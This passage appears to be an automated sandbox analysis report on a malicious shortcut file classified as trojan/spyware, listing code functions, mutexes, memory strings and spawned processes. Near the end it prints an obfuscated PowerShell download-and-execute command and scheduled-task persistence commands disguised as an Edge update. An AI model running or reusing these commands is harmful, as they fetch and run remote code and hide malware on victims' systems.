Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D1D010 14_2_0000023D20D1D010
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D3A81C 14_2_0000023D20D3A81C
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D20174 14_2_0000023D20D20174
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D3E984 14_2_0000023D20D3E984
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D3F940 14_2_0000023D20D3F940
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D35918 14_2_0000023D20D35918
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D348D0 14_2_0000023D20D348D0
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D17270 14_2_0000023D20D17270
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D40270 14_2_0000023D20D40270
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D33A38 14_2_0000023D20D33A38
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D34A50 14_2_0000023D20D34A50
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D43A4D 14_2_0000023D20D43A4D
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D3F1D0 14_2_0000023D20D3F1D0
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_00007DF4318822CC 14_2_00007DF4318822CC
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D98EB8 15_2_000001E879D98EB8
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879DAC668 15_2_000001E879DAC668
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D96E94 15_2_000001E879D96E94
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879DA4660 15_2_000001E879DA4660
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D8D604 15_2_000001E879D8D604
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D88DF4 15_2_000001E879D88DF4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D9AE10 15_2_000001E879D9AE10
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879DA25B4 15_2_000001E879DA25B4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D8C5D4 15_2_000001E879D8C5D4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D99D30 15_2_000001E879D99D30
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879DAC500 15_2_000001E879DAC500
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D9A4F8 15_2_000001E879D9A4F8
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D9A860 15_2_000001E879D9A860
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D99818 15_2_000001E879D99818
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D9F76C 15_2_000001E879D9F76C
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D927A4 15_2_000001E879D927A4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D992D4 15_2_000001E879D992D4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879DA2AA0 15_2_000001E879DA2AA0
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879DA2254 15_2_000001E879DA2254
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879DA3210 15_2_000001E879DA3210
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D98980 15_2_000001E879D98980
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879DA4144 15_2_000001E879DA4144
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D8BC68 15_2_000001E879D8BC68
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D9E428 15_2_000001E879D9E428
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D953C8 15_2_000001E879D953C8
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D8737C 15_2_000001E879D8737C
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879DA3B40 15_2_000001E879DA3B40
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE32D24 18_2_000001AADAE32D24
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE3C750 18_2_000001AADAE3C750
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE36F24 18_2_000001AADAE36F24
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE3BEB8 18_2_000001AADAE3BEB8
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE486B4 18_2_000001AADAE486B4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE55EC8 18_2_000001AADAE55EC8
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE43EA4 18_2_000001AADAE43EA4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE47684 18_2_000001AADAE47684
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE4D854 18_2_000001AADAE4D854
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE3D010 18_2_000001AADAE3D010
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE5A81C 18_2_000001AADAE5A81C
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE53F70 18_2_000001AADAE53F70
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE46D18 18_2_000001AADAE46D18
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE214D0 18_2_000001AADAE214D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE5ECE4 18_2_000001AADAE5ECE4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE3DCE4 18_2_000001AADAE3DCE4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE50478 18_2_000001AADAE50478
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE3F618 18_2_000001AADAE3F618
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE22628 18_2_000001AADAE22628
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE595D4 18_2_000001AADAE595D4
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE54DE8 18_2_000001AADAE54DE8
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE555B0 18_2_000001AADAE555B0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE60D90 18_2_000001AADAE60D90
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE35ADC 18_2_000001AADAE35ADC
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE60270 18_2_000001AADAE60270
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE37270 18_2_000001AADAE37270
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE66434 18_2_000001AADAE66434
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE5CC00 18_2_000001AADAE5CC00
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE3E398 18_2_000001AADAE3E398
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE5F940 18_2_000001AADAE5F940
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE55918 18_2_000001AADAE55918
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE548D0 18_2_000001AADAE548D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE47094 18_2_000001AADAE47094
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE60874 18_2_000001AADAE60874
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE54A50 18_2_000001AADAE54A50
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE63A4D 18_2_000001AADAE63A4D
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE2C25C 18_2_000001AADAE2C25C
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE53A38 18_2_000001AADAE53A38
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE5F1D0 18_2_000001AADAE5F1D0
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE40174 18_2_000001AADAE40174
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE5E984 18_2_000001AADAE5E984
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\miEk.ini BE86E0357748F3B4FA166342F284800A83C955C2C8B197475C2450613A6EED67
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\u0ow.ini 55A451457DBC1F6D28A4C1AB2D477FBBFAE002999A0789C9F3D1BD6610511D98
Found potential string decryption / allocating functions
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF717717EF0 appears 224 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF7177AD4B0 appears 72 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF717797290 appears 129 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF71779C9D0 appears 64 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF717797030 appears 31 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF717797520 appears 48 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF7177AC954 appears 41 times
Source: C:\Users\Public\ajbs50ul.bat Code function: String function: 00007FF717760EF0 appears 40 times
PE file contains more sections than normal
Source: miEk.ini.4.dr Static PE information: Number of sections : 11 > 10
Source: ajbs50ul.bat.3.dr Static PE information: Number of sections : 11 > 10
Source: utox_x86_x64.exe.3.dr Static PE information: Number of sections : 21 > 10
Source: 8.3.regsvr32.exe.2c84fd0.7.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.3.regsvr32.exe.2c84fd0.7.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.regsvr32.exe.1b690000.3.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.regsvr32.exe.1b690000.3.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.3.regsvr32.exe.2c84fd0.6.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.3.regsvr32.exe.2c84fd0.6.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.regsvr32.exe.12f59ac0.2.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.regsvr32.exe.12f59ac0.2.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.regsvr32.exe.2c84fd0.0.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.regsvr32.exe.2c84fd0.0.raw.unpack, Redist.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.evad.winLNK@30/20@3/30
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177585F0 memset,FormatMessageW,GetLastError, 4_2_00007FF7177585F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717767140 CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle, 4_2_00007FF717767140
Source: C:\Users\user\Desktop\utox_x86_x64.exe Code function: 9_2_00614FA0 CoInitialize,CoInitialize,CoCreateInstance,CoCreateInstance,CoUninitialize,PeekMessageA,SetEvent,SetEvent,GetMessageA,GetMessageA,CoUninitialize,SetEvent,SetEvent, 9_2_00614FA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe Mutant created: NULL
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\cbRHd
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Users\user\Desktop\utox_x86_x64.exe Mutant created: \Sessions\1\BaseNamedObjects\uTox
Source: C:\Windows\System32\rekeywiz.exe Mutant created: \Sessions\1\BaseNamedObjects\MUTEX
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\System32\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\Jason_OsodJpavasJmnlndsto
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3hct0mt.ldv.ps1 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: OpenWith.exe, 0000000C.00000003.1719875612.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672317407.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1636322926.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1659269474.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1664518031.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1669570254.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1635992929.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672698778.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1657600437.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1670784258.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1642274997.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 0000000C.00000003.1719875612.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672317407.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1636322926.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1659269474.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1664518031.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1669570254.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1635992929.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672698778.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1657600437.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1670784258.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1642274997.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 0000000C.00000003.1719875612.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672317407.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1636322926.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1659269474.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1664518031.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1669570254.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1635992929.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672698778.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1657600437.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1670784258.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1642274997.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 0000000C.00000003.1719875612.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672317407.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1636322926.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1659269474.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1664518031.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1669570254.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1635992929.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672698778.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1657600437.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1670784258.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1642274997.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 0000000C.00000003.1719875612.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672317407.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1636322926.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1659269474.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1664518031.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1669570254.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1635992929.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672698778.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1657600437.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1670784258.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1642274997.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: OpenWith.exe, 0000000C.00000003.1719875612.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672317407.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1636322926.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1659269474.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1664518031.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1669570254.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1635992929.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672698778.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1657600437.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1670784258.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1642274997.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 0000000C.00000003.1671498025.0000022BF7C48000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1675811579.0000022BF7C0D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1671613192.0000022BF7C48000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1675158798.0000022BF7C4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 0000000C.00000003.1719875612.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672317407.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1636322926.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1659269474.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1664518031.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1669570254.0000022BF85F6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1635992929.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1672698778.0000022BF85FB000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1657600437.0000022BF85FD000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1670784258.0000022BF85F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1642274997.0000022BF85FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: rpQF1aDIK4.lnk ReversingLabs: Detection: 13%
Source: utox_x86_x64.exe String found in binary or memory: impossible: unknown friend-add error
Source: utox_x86_x64.exe String found in binary or memory: -h --help Shows this help text.
Source: utox_x86_x64.exe String found in binary or memory: -h --help Shows this help text.
Source: utox_x86_x64.exe String found in binary or memory: Search/Add Friends
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{808CCC00-48CC-4040-C488-C044888CCCC0}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmpshare.exe "C:\Program Files\Windows Media Player\wmpshare.exe"
Source: C:\Program Files\Windows Media Player\wmpshare.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C88C8848-C040-4888-C800-C800848C4848}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini
